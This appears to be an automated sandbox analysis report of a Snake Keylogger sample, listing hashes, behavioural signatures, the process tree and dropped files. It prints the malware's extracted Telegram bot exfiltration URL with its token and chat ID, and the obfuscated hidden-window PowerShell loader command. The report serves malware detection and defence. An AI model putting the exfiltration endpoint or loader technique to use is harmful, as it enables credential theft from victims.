Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-10-2024 16:38
Static task
static1
Behavioral task
behavioral1
Sample
SEM2024000002383.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SEM2024000002383.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Synligstes84.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Synligstes84.ps1
Resource
win10v2004-20241007-en
General
-
Target
SEM2024000002383.exe
-
Size
748KB
-
MD5
06fa51d68f2545f28a2b942b01a4bb13
-
SHA1
74fb1ce042c1982155d6d190b446dd429c7ad463
-
SHA256
fb79dfe6e2eebbe7882d3e688ff377c3ffcfc8d41f35e1af16f224846f4fab5b
-
SHA512
a11d5b3fccfc2cf03913903382b2521b609bd2d798d50e6b151c8a88f1cb835456e0f1ace18c50037de6b93c656f51b88e783fb42b80b38fd3be0d772cc5c773
-
SSDEEP
12288:jG6QMVyGP0Fx53cAA0jGnheowOyGOs61IYZVAecgs9FMa1Mdq8jJM:jG6QtGP0OhsGnheowDGMIYO7MoOM
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7840943707:AAFvjApaxzyzfiy9tTVH4n-N6k-rIeMo504/sendMessage?chat_id=2129508827
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/4852-135-0x0000000000470000-0x0000000000496000-memory.dmp family_snakekeylogger behavioral2/memory/4852-133-0x0000000000470000-0x00000000016C4000-memory.dmp family_snakekeylogger -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2716 powershell.exe 4052 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 2476 sparekassebestyrere.exe 4852 sparekassebestyrere.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 36 drive.google.com 37 drive.google.com 38 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 60 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 4852 sparekassebestyrere.exe 2476 sparekassebestyrere.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2716 powershell.exe 4052 powershell.exe 2476 sparekassebestyrere.exe 4852 sparekassebestyrere.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\Grubstaking.bro SEM2024000002383.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sparekassebestyrere.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sparekassebestyrere.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SEM2024000002383.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 2716 powershell.exe 2716 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 2716 powershell.exe 2716 powershell.exe 2716 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 2716 powershell.exe 2716 powershell.exe 2716 powershell.exe 2716 powershell.exe 4052 powershell.exe 4852 sparekassebestyrere.exe 4852 sparekassebestyrere.exe 2476 sparekassebestyrere.exe 2476 sparekassebestyrere.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2716 powershell.exe 4052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeIncreaseQuotaPrivilege 4052 powershell.exe Token: SeSecurityPrivilege 4052 powershell.exe Token: SeTakeOwnershipPrivilege 4052 powershell.exe Token: SeLoadDriverPrivilege 4052 powershell.exe Token: SeSystemProfilePrivilege 4052 powershell.exe Token: SeSystemtimePrivilege 4052 powershell.exe Token: SeProfSingleProcessPrivilege 4052 powershell.exe Token: SeIncBasePriorityPrivilege 4052 powershell.exe Token: SeCreatePagefilePrivilege 4052 powershell.exe Token: SeBackupPrivilege 4052 powershell.exe Token: SeRestorePrivilege 4052 powershell.exe Token: SeShutdownPrivilege 4052 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeSystemEnvironmentPrivilege 4052 powershell.exe Token: SeRemoteShutdownPrivilege 4052 powershell.exe Token: SeUndockPrivilege 4052 powershell.exe Token: SeManageVolumePrivilege 4052 powershell.exe Token: 33 4052 powershell.exe Token: 34 4052 powershell.exe Token: 35 4052 powershell.exe Token: 36 4052 powershell.exe Token: SeIncreaseQuotaPrivilege 2716 powershell.exe Token: SeSecurityPrivilege 2716 powershell.exe Token: SeTakeOwnershipPrivilege 2716 powershell.exe Token: SeLoadDriverPrivilege 2716 powershell.exe Token: SeSystemProfilePrivilege 2716 powershell.exe Token: SeSystemtimePrivilege 2716 powershell.exe Token: SeProfSingleProcessPrivilege 2716 powershell.exe Token: SeIncBasePriorityPrivilege 2716 powershell.exe Token: SeCreatePagefilePrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeRestorePrivilege 2716 powershell.exe Token: SeShutdownPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeSystemEnvironmentPrivilege 2716 powershell.exe Token: SeRemoteShutdownPrivilege 2716 powershell.exe Token: SeUndockPrivilege 2716 powershell.exe Token: SeManageVolumePrivilege 2716 powershell.exe Token: 33 2716 powershell.exe Token: 34 2716 powershell.exe Token: 35 2716 powershell.exe Token: 36 2716 powershell.exe Token: SeDebugPrivilege 4852 sparekassebestyrere.exe Token: SeDebugPrivilege 2476 sparekassebestyrere.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4504 wrote to memory of 2716 4504 SEM2024000002383.exe 84 PID 4504 wrote to memory of 2716 4504 SEM2024000002383.exe 84 PID 4504 wrote to memory of 2716 4504 SEM2024000002383.exe 84 PID 4504 wrote to memory of 4052 4504 SEM2024000002383.exe 89 PID 4504 wrote to memory of 4052 4504 SEM2024000002383.exe 89 PID 4504 wrote to memory of 4052 4504 SEM2024000002383.exe 89 PID 2716 wrote to memory of 2476 2716 powershell.exe 98 PID 2716 wrote to memory of 2476 2716 powershell.exe 98 PID 2716 wrote to memory of 2476 2716 powershell.exe 98 PID 2716 wrote to memory of 2476 2716 powershell.exe 98 PID 4052 wrote to memory of 4852 4052 powershell.exe 99 PID 4052 wrote to memory of 4852 4052 powershell.exe 99 PID 4052 wrote to memory of 4852 4052 powershell.exe 99 PID 4052 wrote to memory of 4852 4052 powershell.exe 99 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SEM2024000002383.exe"C:\Users\Admin\AppData\Local\Temp\SEM2024000002383.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Woodwaxen=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Synligstes84.Hig';$Fragtvogne=$Woodwaxen.SubString(6209,3);.$Fragtvogne($Woodwaxen)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"3⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2476
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Woodwaxen=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Synligstes84.Hig';$Fragtvogne=$Woodwaxen.SubString(6209,3);.$Fragtvogne($Woodwaxen)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"3⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD543832069d8f03a5d73dc278fae3b35ea
SHA1ff26203bf08efd341b9b7af5a691e6f3abd84822
SHA2561e471a8afb34a6896632c7930b04f0aa6771aece3c7c97e270da8ab55970fb6f
SHA512c66445de1b855578da64212bcd649fdfe0ab3ce43c6635614779f1ca656cb732458eac03e6a3119cb6aa3728ca85b791da68f1a9a2ab4b33b338f7bd89f7b194
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD555dd21411f214fc63eeacc240a6e8b61
SHA111374ef319aa8627dd65619e6e6f4886c6124bb7
SHA2566b82653fabdf71adbeb51838b98136533d47c77991d73da6318d4fae61f0b0f5
SHA512d6f585d48b85a45588f7ad4b24e0fe2a5894ea395b593fb9bb1f50644f3857bd25f8ba4b2aa370b9ed9e568b7bf6dce115cb9577ede452a9a8548d656cca55a5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5bac80766bb58bd773b103a4901553ec8
SHA1a70d9baf9bad99c2dc5b7c2651a7c37e676ff6b5
SHA2568df55918cdbd2a47e6e3d059a8d81619347b7d251bf30cf93ad73820e3a9e6ea
SHA51291796008239d01776728ac888f35a8cf9d85ff0d4c5e848b0dfba8b2be914b7c92378c9bf3928fc325dc7bcb46ebcf492deaf7776aee3421e5abf7acdebdc060
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD57f646a9724e29069c06cca20f5cff4e3
SHA123f8c05f0ca8c25e0ee1fe1b81c9ce83fc919eb5
SHA256027e0b82257121180eaa9d61e53b6973173e4ccc3f118309d0344b4176ce770c
SHA512357828881d262045788113f5cedd2361a7f8d84fd4a6454070b3e75da905538eb529b675d9c5a5ddcfa6359dec1c21e5d0cd004c4f633cad7a2fb44c9f7687dd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD57c904444bb801e3bed7c479a4e03dd73
SHA1ab6e49be103e59609f9d8158edcb866f091b0cbe
SHA2568c5e3dd5ecbc09a24d5e90c5c0e4aa2ab3d5667757305af54cf33d0330980153
SHA512b82f330740e260899d2de6e83e5469e7ce394de602814b0f7e4ab17a88be23cfeb06bf049cf160330baeb3e95f996f0000d9b43c4323932ab84f929255ef2380
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD51bfaaedb8fd209f88294390206357ec5
SHA1d3b73f1a85991b8215d57b3851d1697f0c154934
SHA256763b6a00e459205aa9f832c19ba99d1b7520e9ec4023a4f8c34a6582f4ee6051
SHA512f6e7b01b10501c797e1f522f57110f508a77d2919541496e0131c1715b0987cd439360398d2862fe3601279efc3ee230279a0428a7dcce2927138e1e30ac8536
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD58a513305673aac77269c36b9835b4fb3
SHA15effe6a6400ee1ac40079b9675f1f41752ad4304
SHA256111cd6a1ff4c5e23b0cfac1c25cd0ac0e0322a3d7e27e28915acccb67b2238a7
SHA51229c437bae63e3c591c3235f3507489d3c9bba510848e89bd202274f240fb0318a39d61e69f048fdf3b43223b6fee89b0d23e89e4b7ef0f22df787cfb1e1a7ae1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD525020628e1fddf79b469088c7b04b153
SHA156a664315d5ca616b7ca2cf18d169dce8fc1823a
SHA256a894ac36e721cb07a354b7fe20ff4c8e570e9a993e40c8b25a7af211ff82c33c
SHA512d4577e631a7a8e97309b0034c589471244c6888aedcff085e47e081f51b8bc1c23b110715a488d48b1ed6501d9222e23f47b8bc2eed2fdc252ce4b8129a1181a
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
748KB
MD506fa51d68f2545f28a2b942b01a4bb13
SHA174fb1ce042c1982155d6d190b446dd429c7ad463
SHA256fb79dfe6e2eebbe7882d3e688ff377c3ffcfc8d41f35e1af16f224846f4fab5b
SHA512a11d5b3fccfc2cf03913903382b2521b609bd2d798d50e6b151c8a88f1cb835456e0f1ace18c50037de6b93c656f51b88e783fb42b80b38fd3be0d772cc5c773
-
Filesize
306KB
MD5e722a2a3f5a340e2b87e12ec6a1f33a5
SHA1b0c047440e053e3ec01d6d94cc1f21663294dd27
SHA2564c2064e7a4e41fe147b87eb6e298bb93133b9b2334d143a1b18ec5758ac487fc
SHA512a8359b0abc35dd980cda9a117ed85bc622df00ad827c0afa7c185270869404fbcc4e43c8640b1c5aee1f4048c100d375372bbc80410fecf747f2717ff266a26a
-
Filesize
53KB
MD5453a8e6a5068ae5a2e5d99de31a13b3b
SHA19f202a5b9a8cf1ae90030e14ea99c4e787338ede
SHA2564ac6b7ddcc88b43191a8e1329e632c3246b10dcd077b1e79efa2f0559cafa7f6
SHA51237b6296b2434b1791d7e709d17cd8bcce6d8111505648b63227e1004461de31d07922497ed80be4e6ab115ece2964394cf6a3c1b26725a3da2fa0bb3cf7cac46